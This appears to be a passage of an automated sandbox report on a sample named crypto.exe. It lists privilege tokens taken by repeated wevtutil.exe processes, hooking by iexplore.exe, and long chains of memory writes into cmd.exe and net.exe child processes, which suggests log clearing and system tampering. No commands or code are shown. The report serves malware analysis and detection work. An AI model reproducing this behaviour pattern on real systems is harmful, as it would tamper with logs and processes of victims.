Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1796	wevtutil.exe
Token: SeBackupPrivilege	1796	wevtutil.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	1256	wevtutil.exe
Token: SeBackupPrivilege	1256	wevtutil.exe
Token: SeSecurityPrivilege	2020	wevtutil.exe
Token: SeBackupPrivilege	2020	wevtutil.exe
Token: SeSecurityPrivilege	240	wevtutil.exe
Token: SeBackupPrivilege	240	wevtutil.exe
Token: SeSecurityPrivilege	736	wevtutil.exe
Token: SeBackupPrivilege	736	wevtutil.exe
Token: SeSecurityPrivilege	1824	wevtutil.exe
Token: SeBackupPrivilege	1824	wevtutil.exe
Token: SeSecurityPrivilege	1976	wevtutil.exe
Token: SeBackupPrivilege	1976	wevtutil.exe
Token: SeSecurityPrivilege	1552	wevtutil.exe
Token: SeBackupPrivilege	1552	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1792	wevtutil.exe
Token: SeBackupPrivilege	1792	wevtutil.exe
Token: SeSecurityPrivilege	1644	wevtutil.exe
Token: SeBackupPrivilege	1644	wevtutil.exe
Token: SeSecurityPrivilege	1876	wevtutil.exe
Token: SeBackupPrivilege	1876	wevtutil.exe
Token: SeSecurityPrivilege	1820	wevtutil.exe
Token: SeBackupPrivilege	1820	wevtutil.exe
Token: SeSecurityPrivilege	600	wevtutil.exe
Token: SeBackupPrivilege	600	wevtutil.exe
Token: SeSecurityPrivilege	1200	wevtutil.exe
Token: SeBackupPrivilege	1200	wevtutil.exe
Token: SeSecurityPrivilege	860	wevtutil.exe
Token: SeBackupPrivilege	860	wevtutil.exe
Token: SeSecurityPrivilege	1408	wevtutil.exe
Token: SeBackupPrivilege	1408	wevtutil.exe
Token: SeSecurityPrivilege	564	wevtutil.exe
Token: SeBackupPrivilege	564	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	908	wevtutil.exe
Token: SeBackupPrivilege	908	wevtutil.exe
Token: SeSecurityPrivilege	1980	wevtutil.exe
Token: SeBackupPrivilege	1980	wevtutil.exe
Token: SeSecurityPrivilege	952	wevtutil.exe
Token: SeBackupPrivilege	952	wevtutil.exe
Token: SeSecurityPrivilege	1804	wevtutil.exe
Token: SeBackupPrivilege	1804	wevtutil.exe
Token: SeSecurityPrivilege	1996	wevtutil.exe
Token: SeBackupPrivilege	1996	wevtutil.exe
Token: SeSecurityPrivilege	1112	wevtutil.exe
Token: SeBackupPrivilege	1112	wevtutil.exe
Token: 33	908	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	908	AUDIODG.EXE
Token: 33	908	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	908	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
600	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
600	iexplore.exe
600	iexplore.exe
864	IEXPLORE.EXE
864	IEXPLORE.EXE
864	IEXPLORE.EXE
864	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 1641 IoCs

description	pid	Process	procid_target
PID 1296 wrote to memory of 1528	1296	crypto.exe	26
PID 1296 wrote to memory of 1528	1296	crypto.exe	26
PID 1296 wrote to memory of 1528	1296	crypto.exe	26
PID 1528 wrote to memory of 1520	1528	cmd.exe	27
PID 1528 wrote to memory of 1520	1528	cmd.exe	27
PID 1528 wrote to memory of 1520	1528	cmd.exe	27
PID 1296 wrote to memory of 1700	1296	crypto.exe	28
PID 1296 wrote to memory of 1700	1296	crypto.exe	28
PID 1296 wrote to memory of 1700	1296	crypto.exe	28
PID 1700 wrote to memory of 1804	1700	cmd.exe	29
PID 1700 wrote to memory of 1804	1700	cmd.exe	29
PID 1700 wrote to memory of 1804	1700	cmd.exe	29
PID 1296 wrote to memory of 1900	1296	crypto.exe	34
PID 1296 wrote to memory of 1900	1296	crypto.exe	34
PID 1296 wrote to memory of 1900	1296	crypto.exe	34
PID 1900 wrote to memory of 1996	1900	cmd.exe	35
PID 1900 wrote to memory of 1996	1900	cmd.exe	35
PID 1900 wrote to memory of 1996	1900	cmd.exe	35
PID 1296 wrote to memory of 1972	1296	crypto.exe	36
PID 1296 wrote to memory of 1972	1296	crypto.exe	36
PID 1296 wrote to memory of 1972	1296	crypto.exe	36
PID 1972 wrote to memory of 2020	1972	cmd.exe	37
PID 1972 wrote to memory of 2020	1972	cmd.exe	37
PID 1972 wrote to memory of 2020	1972	cmd.exe	37
PID 1296 wrote to memory of 324	1296	crypto.exe	38
PID 1296 wrote to memory of 324	1296	crypto.exe	38
PID 1296 wrote to memory of 324	1296	crypto.exe	38
PID 1296 wrote to memory of 572	1296	crypto.exe	39
PID 1296 wrote to memory of 572	1296	crypto.exe	39
PID 1296 wrote to memory of 572	1296	crypto.exe	39
PID 1296 wrote to memory of 1356	1296	crypto.exe	40
PID 1296 wrote to memory of 1356	1296	crypto.exe	40
PID 1296 wrote to memory of 1356	1296	crypto.exe	40
PID 1296 wrote to memory of 800	1296	crypto.exe	41
PID 1296 wrote to memory of 800	1296	crypto.exe	41
PID 1296 wrote to memory of 800	1296	crypto.exe	41
PID 800 wrote to memory of 1028	800	cmd.exe	42
PID 800 wrote to memory of 1028	800	cmd.exe	42
PID 800 wrote to memory of 1028	800	cmd.exe	42
PID 1296 wrote to memory of 1216	1296	crypto.exe	43
PID 1296 wrote to memory of 1216	1296	crypto.exe	43
PID 1296 wrote to memory of 1216	1296	crypto.exe	43
PID 1216 wrote to memory of 672	1216	cmd.exe	44
PID 1216 wrote to memory of 672	1216	cmd.exe	44
PID 1216 wrote to memory of 672	1216	cmd.exe	44
PID 672 wrote to memory of 824	672	net.exe	45
PID 672 wrote to memory of 824	672	net.exe	45
PID 672 wrote to memory of 824	672	net.exe	45
PID 1296 wrote to memory of 328	1296	crypto.exe	46
PID 1296 wrote to memory of 328	1296	crypto.exe	46
PID 1296 wrote to memory of 328	1296	crypto.exe	46
PID 328 wrote to memory of 1408	328	cmd.exe	47
PID 328 wrote to memory of 1408	328	cmd.exe	47
PID 328 wrote to memory of 1408	328	cmd.exe	47
PID 1408 wrote to memory of 688	1408	net.exe	48
PID 1408 wrote to memory of 688	1408	net.exe	48
PID 1408 wrote to memory of 688	1408	net.exe	48
PID 1296 wrote to memory of 1864	1296	crypto.exe	49
PID 1296 wrote to memory of 1864	1296	crypto.exe	49
PID 1296 wrote to memory of 1864	1296	crypto.exe	49
PID 1864 wrote to memory of 556	1864	cmd.exe	50
PID 1864 wrote to memory of 556	1864	cmd.exe	50
PID 1864 wrote to memory of 556	1864	cmd.exe	50
PID 556 wrote to memory of 388	556	net.exe	51
PID 556 wrote to memory of 388	556	net.exe	51
PID 556 wrote to memory of 388	556	net.exe	51
PID 1296 wrote to memory of 1872	1296	crypto.exe	52
PID 1296 wrote to memory of 1872	1296	crypto.exe	52
PID 1296 wrote to memory of 1872	1296	crypto.exe	52
PID 1872 wrote to memory of 316	1872	cmd.exe	53
PID 1872 wrote to memory of 316	1872	cmd.exe	53
PID 1872 wrote to memory of 316	1872	cmd.exe	53
PID 316 wrote to memory of 1080	316	net.exe	54
PID 316 wrote to memory of 1080	316	net.exe	54
PID 316 wrote to memory of 1080	316	net.exe	54
PID 1296 wrote to memory of 2044	1296	crypto.exe	55
PID 1296 wrote to memory of 2044	1296	crypto.exe	55
PID 1296 wrote to memory of 2044	1296	crypto.exe	55
PID 2044 wrote to memory of 2012	2044	cmd.exe	56
PID 2044 wrote to memory of 2012	2044	cmd.exe	56
PID 2044 wrote to memory of 2012	2044	cmd.exe	56
PID 2012 wrote to memory of 1608	2012	net.exe	57
PID 2012 wrote to memory of 1608	2012	net.exe	57
PID 2012 wrote to memory of 1608	2012	net.exe	57
PID 1296 wrote to memory of 1492	1296	crypto.exe	58
PID 1296 wrote to memory of 1492	1296	crypto.exe	58
PID 1296 wrote to memory of 1492	1296	crypto.exe	58
PID 1492 wrote to memory of 1560	1492	cmd.exe	59
PID 1492 wrote to memory of 1560	1492	cmd.exe	59
PID 1492 wrote to memory of 1560	1492	cmd.exe	59
PID 1560 wrote to memory of 1496	1560	net.exe	60
PID 1560 wrote to memory of 1496	1560	net.exe	60
PID 1560 wrote to memory of 1496	1560	net.exe	60
PID 1296 wrote to memory of 1532	1296	crypto.exe	61
PID 1296 wrote to memory of 1532	1296	crypto.exe	61
PID 1296 wrote to memory of 1532	1296	crypto.exe	61
PID 1296 wrote to memory of 1060	1296	crypto.exe	62
PID 1296 wrote to memory of 1060	1296	crypto.exe	62
PID 1296 wrote to memory of 1060	1296	crypto.exe	62
PID 1060 wrote to memory of 1048	1060	cmd.exe	63
PID 1060 wrote to memory of 1048	1060	cmd.exe	63
PID 1060 wrote to memory of 1048	1060	cmd.exe	63
PID 1060 wrote to memory of 1048	1060	cmd.exe	63
PID 1296 wrote to memory of 1356	1296	crypto.exe	64
PID 1296 wrote to memory of 1356	1296	crypto.exe	64
PID 1296 wrote to memory of 1356	1296	crypto.exe	64
PID 1356 wrote to memory of 928	1356	cmd.exe	65
PID 1356 wrote to memory of 928	1356	cmd.exe	65
PID 1356 wrote to memory of 928	1356	cmd.exe	65
PID 1356 wrote to memory of 928	1356	cmd.exe	65
PID 1296 wrote to memory of 992	1296	crypto.exe	66
PID 1296 wrote to memory of 992	1296	crypto.exe	66
PID 1296 wrote to memory of 992	1296	crypto.exe	66
PID 992 wrote to memory of 660	992	cmd.exe	67
PID 992 wrote to memory of 660	992	cmd.exe	67
PID 992 wrote to memory of 660	992	cmd.exe	67
PID 660 wrote to memory of 2040	660	cmd.exe	68
PID 660 wrote to memory of 2040	660	cmd.exe	68
PID 660 wrote to memory of 2040	660	cmd.exe	68
PID 992 wrote to memory of 316	992	cmd.exe	69
PID 992 wrote to memory of 316	992	cmd.exe	69
PID 992 wrote to memory of 316	992	cmd.exe	69
PID 316 wrote to memory of 300	316	cmd.exe	70
PID 316 wrote to memory of 300	316	cmd.exe	70
PID 316 wrote to memory of 300	316	cmd.exe	70
PID 992 wrote to memory of 1608	992	cmd.exe	71
PID 992 wrote to memory of 1608	992	cmd.exe	71
PID 992 wrote to memory of 1608	992	cmd.exe	71
PID 992 wrote to memory of 2044	992	cmd.exe	72
PID 992 wrote to memory of 2044	992	cmd.exe	72
PID 992 wrote to memory of 2044	992	cmd.exe	72
PID 992 wrote to memory of 1512	992	cmd.exe	73
PID 992 wrote to memory of 1512	992	cmd.exe	73
PID 992 wrote to memory of 1512	992	cmd.exe	73
PID 992 wrote to memory of 1564	992	cmd.exe	74
PID 992 wrote to memory of 1564	992	cmd.exe	74
PID 992 wrote to memory of 1564	992	cmd.exe	74
PID 992 wrote to memory of 1400	992	cmd.exe	75
PID 992 wrote to memory of 1400	992	cmd.exe	75
PID 992 wrote to memory of 1400	992	cmd.exe	75
PID 992 wrote to memory of 1944	992	cmd.exe	76
PID 992 wrote to memory of 1944	992	cmd.exe	76
PID 992 wrote to memory of 1944	992	cmd.exe	76
PID 992 wrote to memory of 1960	992	cmd.exe	77
PID 992 wrote to memory of 1960	992	cmd.exe	77
PID 992 wrote to memory of 1960	992	cmd.exe	77
PID 992 wrote to memory of 1968	992	cmd.exe	78
PID 992 wrote to memory of 1968	992	cmd.exe	78
PID 992 wrote to memory of 1968	992	cmd.exe	78
PID 992 wrote to memory of 1136	992	cmd.exe	79
PID 992 wrote to memory of 1136	992	cmd.exe	79
PID 992 wrote to memory of 1136	992	cmd.exe	79
PID 992 wrote to memory of 1088	992	cmd.exe	80
PID 992 wrote to memory of 1088	992	cmd.exe	80
PID 992 wrote to memory of 1088	992	cmd.exe	80
PID 992 wrote to memory of 1972	992	cmd.exe	81
PID 992 wrote to memory of 1972	992	cmd.exe	81
PID 992 wrote to memory of 1972	992	cmd.exe	81
PID 992 wrote to memory of 1788	992	cmd.exe	82
PID 992 wrote to memory of 1788	992	cmd.exe	82
PID 992 wrote to memory of 1788	992	cmd.exe	82
PID 992 wrote to memory of 1988	992	cmd.exe	83
PID 992 wrote to memory of 1988	992	cmd.exe	83
PID 992 wrote to memory of 1988	992	cmd.exe	83
PID 992 wrote to memory of 2004	992	cmd.exe	84
PID 992 wrote to memory of 2004	992	cmd.exe	84
PID 992 wrote to memory of 2004	992	cmd.exe	84
PID 992 wrote to memory of 1220	992	cmd.exe	85
PID 992 wrote to memory of 1220	992	cmd.exe	85
PID 992 wrote to memory of 1220	992	cmd.exe	85
PID 992 wrote to memory of 1060	992	cmd.exe	86
PID 992 wrote to memory of 1060	992	cmd.exe	86
PID 992 wrote to memory of 1060	992	cmd.exe	86
PID 992 wrote to memory of 1840	992	cmd.exe	87
PID 992 wrote to memory of 1840	992	cmd.exe	87
PID 992 wrote to memory of 1840	992	cmd.exe	87
PID 992 wrote to memory of 624	992	cmd.exe	88
PID 992 wrote to memory of 624	992	cmd.exe	88
PID 992 wrote to memory of 624	992	cmd.exe	88
PID 992 wrote to memory of 1040	992	cmd.exe	89
PID 992 wrote to memory of 1040	992	cmd.exe	89
PID 992 wrote to memory of 1040	992	cmd.exe	89
PID 992 wrote to memory of 1688	992	cmd.exe	90
PID 992 wrote to memory of 1688	992	cmd.exe	90
PID 992 wrote to memory of 1688	992	cmd.exe	90
PID 992 wrote to memory of 328	992	cmd.exe	91
PID 992 wrote to memory of 328	992	cmd.exe	91
PID 992 wrote to memory of 328	992	cmd.exe	91
PID 992 wrote to memory of 2032	992	cmd.exe	92
PID 992 wrote to memory of 2032	992	cmd.exe	92
PID 992 wrote to memory of 2032	992	cmd.exe	92
PID 992 wrote to memory of 1152	992	cmd.exe	93
PID 992 wrote to memory of 1152	992	cmd.exe	93
PID 992 wrote to memory of 1152	992	cmd.exe	93
PID 992 wrote to memory of 1880	992	cmd.exe	94
PID 992 wrote to memory of 1880	992	cmd.exe	94
PID 992 wrote to memory of 1880	992	cmd.exe	94
PID 992 wrote to memory of 972	992	cmd.exe	95
PID 992 wrote to memory of 972	992	cmd.exe	95
PID 992 wrote to memory of 972	992	cmd.exe	95
PID 992 wrote to memory of 1272	992	cmd.exe	96
PID 992 wrote to memory of 1272	992	cmd.exe	96
PID 992 wrote to memory of 1272	992	cmd.exe	96
PID 992 wrote to memory of 1076	992	cmd.exe	97
PID 992 wrote to memory of 1076	992	cmd.exe	97
PID 992 wrote to memory of 1076	992	cmd.exe	97
PID 992 wrote to memory of 1232	992	cmd.exe	98
PID 992 wrote to memory of 1232	992	cmd.exe	98
PID 992 wrote to memory of 1232	992	cmd.exe	98
PID 992 wrote to memory of 316	992	cmd.exe	99
PID 992 wrote to memory of 316	992	cmd.exe	99
PID 992 wrote to memory of 316	992	cmd.exe	99
PID 992 wrote to memory of 1608	992	cmd.exe	100
PID 992 wrote to memory of 1608	992	cmd.exe	100
PID 992 wrote to memory of 1608	992	cmd.exe	100
PID 992 wrote to memory of 2044	992	cmd.exe	101
PID 992 wrote to memory of 2044	992	cmd.exe	101
PID 992 wrote to memory of 2044	992	cmd.exe	101
PID 992 wrote to memory of 1512	992	cmd.exe	102
PID 992 wrote to memory of 1512	992	cmd.exe	102
PID 992 wrote to memory of 1512	992	cmd.exe	102
PID 992 wrote to memory of 1564	992	cmd.exe	103
PID 992 wrote to memory of 1564	992	cmd.exe	103
PID 992 wrote to memory of 1564	992	cmd.exe	103
PID 992 wrote to memory of 1400	992	cmd.exe	104
PID 992 wrote to memory of 1400	992	cmd.exe	104
PID 992 wrote to memory of 1400	992	cmd.exe	104
PID 992 wrote to memory of 1944	992	cmd.exe	105
PID 992 wrote to memory of 1944	992	cmd.exe	105
PID 992 wrote to memory of 1944	992	cmd.exe	105
PID 992 wrote to memory of 1960	992	cmd.exe	106
PID 992 wrote to memory of 1960	992	cmd.exe	106
PID 992 wrote to memory of 1960	992	cmd.exe	106
PID 992 wrote to memory of 1968	992	cmd.exe	107
PID 992 wrote to memory of 1968	992	cmd.exe	107
PID 992 wrote to memory of 1968	992	cmd.exe	107
PID 992 wrote to memory of 1136	992	cmd.exe	108
PID 992 wrote to memory of 1136	992	cmd.exe	108
PID 992 wrote to memory of 1136	992	cmd.exe	108
PID 992 wrote to memory of 1088	992	cmd.exe	109
PID 992 wrote to memory of 1088	992	cmd.exe	109
PID 992 wrote to memory of 1088	992	cmd.exe	109
PID 992 wrote to memory of 1972	992	cmd.exe	110
PID 992 wrote to memory of 1972	992	cmd.exe	110
PID 992 wrote to memory of 1972	992	cmd.exe	110
PID 992 wrote to memory of 1788	992	cmd.exe	111
PID 992 wrote to memory of 1788	992	cmd.exe	111
PID 992 wrote to memory of 1788	992	cmd.exe	111
PID 992 wrote to memory of 1988	992	cmd.exe	112
PID 992 wrote to memory of 1988	992	cmd.exe	112
PID 992 wrote to memory of 1988	992	cmd.exe	112
PID 992 wrote to memory of 2004	992	cmd.exe	113
PID 992 wrote to memory of 2004	992	cmd.exe	113
PID 992 wrote to memory of 2004	992	cmd.exe	113
PID 992 wrote to memory of 1220	992	cmd.exe	114
PID 992 wrote to memory of 1220	992	cmd.exe	114
PID 992 wrote to memory of 1220	992	cmd.exe	114
PID 992 wrote to memory of 1060	992	cmd.exe	115
PID 992 wrote to memory of 1060	992	cmd.exe	115
PID 992 wrote to memory of 1060	992	cmd.exe	115
PID 992 wrote to memory of 1840	992	cmd.exe	116
PID 992 wrote to memory of 1840	992	cmd.exe	116
PID 992 wrote to memory of 1840	992	cmd.exe	116
PID 992 wrote to memory of 624	992	cmd.exe	117
PID 992 wrote to memory of 624	992	cmd.exe	117
PID 992 wrote to memory of 624	992	cmd.exe	117
PID 992 wrote to memory of 1040	992	cmd.exe	118
PID 992 wrote to memory of 1040	992	cmd.exe	118
PID 992 wrote to memory of 1040	992	cmd.exe	118
PID 992 wrote to memory of 1688	992	cmd.exe	119
PID 992 wrote to memory of 1688	992	cmd.exe	119
PID 992 wrote to memory of 1688	992	cmd.exe	119
PID 992 wrote to memory of 328	992	cmd.exe	120
PID 992 wrote to memory of 328	992	cmd.exe	120
PID 992 wrote to memory of 328	992	cmd.exe	120
PID 992 wrote to memory of 2032	992	cmd.exe	121
PID 992 wrote to memory of 2032	992	cmd.exe	121
PID 992 wrote to memory of 2032	992	cmd.exe	121
PID 992 wrote to memory of 1152	992	cmd.exe	122
PID 992 wrote to memory of 1152	992	cmd.exe	122
PID 992 wrote to memory of 1152	992	cmd.exe	122
PID 992 wrote to memory of 1880	992	cmd.exe	123
PID 992 wrote to memory of 1880	992	cmd.exe	123
PID 992 wrote to memory of 1880	992	cmd.exe	123
PID 992 wrote to memory of 972	992	cmd.exe	124
PID 992 wrote to memory of 972	992	cmd.exe	124
PID 992 wrote to memory of 972	992	cmd.exe	124
PID 992 wrote to memory of 1272	992	cmd.exe	125
PID 992 wrote to memory of 1272	992	cmd.exe	125
PID 992 wrote to memory of 1272	992	cmd.exe	125
PID 992 wrote to memory of 1076	992	cmd.exe	126
PID 992 wrote to memory of 1076	992	cmd.exe	126
PID 992 wrote to memory of 1076	992	cmd.exe	126
PID 992 wrote to memory of 1232	992	cmd.exe	127
PID 992 wrote to memory of 1232	992	cmd.exe	127
PID 992 wrote to memory of 1232	992	cmd.exe	127
PID 992 wrote to memory of 316	992	cmd.exe	128
PID 992 wrote to memory of 316	992	cmd.exe	128
PID 992 wrote to memory of 316	992	cmd.exe	128
PID 992 wrote to memory of 1608	992	cmd.exe	129
PID 992 wrote to memory of 1608	992	cmd.exe	129
PID 992 wrote to memory of 1608	992	cmd.exe	129
PID 992 wrote to memory of 2044	992	cmd.exe	130
PID 992 wrote to memory of 2044	992	cmd.exe	130
PID 992 wrote to memory of 2044	992	cmd.exe	130
PID 992 wrote to memory of 1512	992	cmd.exe	131
PID 992 wrote to memory of 1512	992	cmd.exe	131
PID 992 wrote to memory of 1512	992	cmd.exe	131
PID 992 wrote to memory of 1564	992	cmd.exe	132
PID 992 wrote to memory of 1564	992	cmd.exe	132
PID 992 wrote to memory of 1564	992	cmd.exe	132
PID 992 wrote to memory of 1400	992	cmd.exe	133
PID 992 wrote to memory of 1400	992	cmd.exe	133
PID 992 wrote to memory of 1400	992	cmd.exe	133
PID 992 wrote to memory of 1944	992	cmd.exe	134
PID 992 wrote to memory of 1944	992	cmd.exe	134
PID 992 wrote to memory of 1944	992	cmd.exe	134
PID 992 wrote to memory of 1960	992	cmd.exe	135
PID 992 wrote to memory of 1960	992	cmd.exe	135
PID 992 wrote to memory of 1960	992	cmd.exe	135
PID 992 wrote to memory of 1968	992	cmd.exe	136
PID 992 wrote to memory of 1968	992	cmd.exe	136
PID 992 wrote to memory of 1968	992	cmd.exe	136
PID 992 wrote to memory of 1136	992	cmd.exe	137
PID 992 wrote to memory of 1136	992	cmd.exe	137
PID 992 wrote to memory of 1136	992	cmd.exe	137
PID 992 wrote to memory of 1088	992	cmd.exe	138
PID 992 wrote to memory of 1088	992	cmd.exe	138
PID 992 wrote to memory of 1088	992	cmd.exe	138
PID 992 wrote to memory of 1972	992	cmd.exe	139
PID 992 wrote to memory of 1972	992	cmd.exe	139
PID 992 wrote to memory of 1972	992	cmd.exe	139
PID 992 wrote to memory of 1788	992	cmd.exe	140
PID 992 wrote to memory of 1788	992	cmd.exe	140
PID 992 wrote to memory of 1788	992	cmd.exe	140
PID 992 wrote to memory of 1988	992	cmd.exe	141
PID 992 wrote to memory of 1988	992	cmd.exe	141
PID 992 wrote to memory of 1988	992	cmd.exe	141
PID 992 wrote to memory of 2004	992	cmd.exe	142
PID 992 wrote to memory of 2004	992	cmd.exe	142
PID 992 wrote to memory of 2004	992	cmd.exe	142
PID 992 wrote to memory of 1220	992	cmd.exe	143
PID 992 wrote to memory of 1220	992	cmd.exe	143
PID 992 wrote to memory of 1220	992	cmd.exe	143
PID 992 wrote to memory of 1060	992	cmd.exe	144
PID 992 wrote to memory of 1060	992	cmd.exe	144
PID 992 wrote to memory of 1060	992	cmd.exe	144
PID 992 wrote to memory of 1840	992	cmd.exe	145
PID 992 wrote to memory of 1840	992	cmd.exe	145
PID 992 wrote to memory of 1840	992	cmd.exe	145
PID 992 wrote to memory of 624	992	cmd.exe	146
PID 992 wrote to memory of 624	992	cmd.exe	146
PID 992 wrote to memory of 624	992	cmd.exe	146
PID 992 wrote to memory of 1040	992	cmd.exe	147
PID 992 wrote to memory of 1040	992	cmd.exe	147
PID 992 wrote to memory of 1040	992	cmd.exe	147
PID 992 wrote to memory of 1688	992	cmd.exe	148
PID 992 wrote to memory of 1688	992	cmd.exe	148
PID 992 wrote to memory of 1688	992	cmd.exe	148
PID 992 wrote to memory of 328	992	cmd.exe	149
PID 992 wrote to memory of 328	992	cmd.exe	149
PID 992 wrote to memory of 328	992	cmd.exe	149
PID 992 wrote to memory of 2032	992	cmd.exe	150
PID 992 wrote to memory of 2032	992	cmd.exe	150
PID 992 wrote to memory of 2032	992	cmd.exe	150
PID 992 wrote to memory of 1152	992	cmd.exe	151
PID 992 wrote to memory of 1152	992	cmd.exe	151
PID 992 wrote to memory of 1152	992	cmd.exe	151
PID 992 wrote to memory of 1880	992	cmd.exe	152
PID 992 wrote to memory of 1880	992	cmd.exe	152
PID 992 wrote to memory of 1880	992	cmd.exe	152
PID 992 wrote to memory of 972	992	cmd.exe	153
PID 992 wrote to memory of 972	992	cmd.exe	153
PID 992 wrote to memory of 972	992	cmd.exe	153
PID 992 wrote to memory of 1272	992	cmd.exe	154
PID 992 wrote to memory of 1272	992	cmd.exe	154
PID 992 wrote to memory of 1272	992	cmd.exe	154
PID 992 wrote to memory of 1076	992	cmd.exe	155
PID 992 wrote to memory of 1076	992	cmd.exe	155
PID 992 wrote to memory of 1076	992	cmd.exe	155
PID 992 wrote to memory of 1232	992	cmd.exe	156
PID 992 wrote to memory of 1232	992	cmd.exe	156
PID 992 wrote to memory of 1232	992	cmd.exe	156
PID 992 wrote to memory of 316	992	cmd.exe	157
PID 992 wrote to memory of 316	992	cmd.exe	157
PID 992 wrote to memory of 316	992	cmd.exe	157
PID 992 wrote to memory of 1608	992	cmd.exe	158
PID 992 wrote to memory of 1608	992	cmd.exe	158
PID 992 wrote to memory of 1608	992	cmd.exe	158
PID 992 wrote to memory of 2044	992	cmd.exe	159
PID 992 wrote to memory of 2044	992	cmd.exe	159
PID 992 wrote to memory of 2044	992	cmd.exe	159
PID 992 wrote to memory of 1512	992	cmd.exe	160
PID 992 wrote to memory of 1512	992	cmd.exe	160
PID 992 wrote to memory of 1512	992	cmd.exe	160
PID 992 wrote to memory of 1564	992	cmd.exe	161
PID 992 wrote to memory of 1564	992	cmd.exe	161
PID 992 wrote to memory of 1564	992	cmd.exe	161
PID 992 wrote to memory of 1400	992	cmd.exe	162
PID 992 wrote to memory of 1400	992	cmd.exe	162
PID 992 wrote to memory of 1400	992	cmd.exe	162
PID 992 wrote to memory of 1944	992	cmd.exe	163
PID 992 wrote to memory of 1944	992	cmd.exe	163
PID 992 wrote to memory of 1944	992	cmd.exe	163
PID 992 wrote to memory of 1960	992	cmd.exe	164
PID 992 wrote to memory of 1960	992	cmd.exe	164
PID 992 wrote to memory of 1960	992	cmd.exe	164
PID 992 wrote to memory of 1968	992	cmd.exe	165
PID 992 wrote to memory of 1968	992	cmd.exe	165
PID 992 wrote to memory of 1968	992	cmd.exe	165
PID 992 wrote to memory of 1136	992	cmd.exe	166
